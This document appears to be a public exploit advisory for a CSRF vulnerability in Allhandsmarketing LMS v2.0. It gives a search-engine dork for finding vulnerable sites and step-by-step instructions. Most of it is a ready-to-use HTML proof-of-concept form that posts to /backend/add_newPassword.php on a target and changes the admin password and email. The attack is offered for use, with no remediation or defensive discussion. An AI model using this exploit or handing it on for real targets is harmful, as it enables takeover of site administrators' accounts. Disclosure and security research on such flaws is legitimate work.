====================================================================================================================================
| # Title     : Allhandsmarketing LMS v2.0 CSRF Vulnerability                                                                      |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | 
| # Vendor    : http://www.allhandsmarketing.com/                                                                                  |  
| # Dork      : " Design by Allhandsmarketing."                                                                                    |
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin Password.

[+] Go to the line 1.

[+] Set the target site link Save changes and apply . 

[+] infected file : /backend/add_newPassword.php .

[+] save code as poc.html .

[+] default user : admin

[+] <form class="form-horizontal" action="http://TARGET/backend/add_newPassword.php" name="form2" id="form2">

                            <fieldset>

                                <div class="form-group">
                                    <label class="col-md-2 control-label" for="text-field">NEW PASSWORD</label>
                                    <div class="col-md-10" id="thumbsite">
                                        <input name="password" id="password" class="form-control" placeholder="Your new password." type="password">
                                    </div>
                                </div>

                                <div class="form-group">
                                    <label class="col-md-2 control-label" for="text-field">RE NEW PASSWORD<meta></label>
                                    <div class="col-md-10" id="thumbsite">
                                        <input name="re_password" id="re_password" class="form-control" placeholder="Re password again." type="password" onchange="check_pass()">

                                    </div>
                                </div>
                                
								<div class="form-group">
                                    <label class="col-md-2 control-label" for="text-field">CHANGE EMAIL</label>
                                    <div class="col-md-10" id="thumbsite">
                                        <input name="newEmail" value="" class="form-control" type="email">

                                    </div>
                                </div>
                                
                            </fieldset>

                            <div class="">
                                <div class="row">
                                    <div class="col-md-12">
                                        <button class="btn btn-default" type="clear">
                                            Cancel
                                        </button>

                                        <button class="btn btn-primary" id="submit-form" name="submit-form" type="submit">
                                            <i class="fa fa-save"></i>
                                            Submit
                                        </button>
                                    </div>
                                </div>
                            </div>

                        </form>

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |
=======================================================================================================================================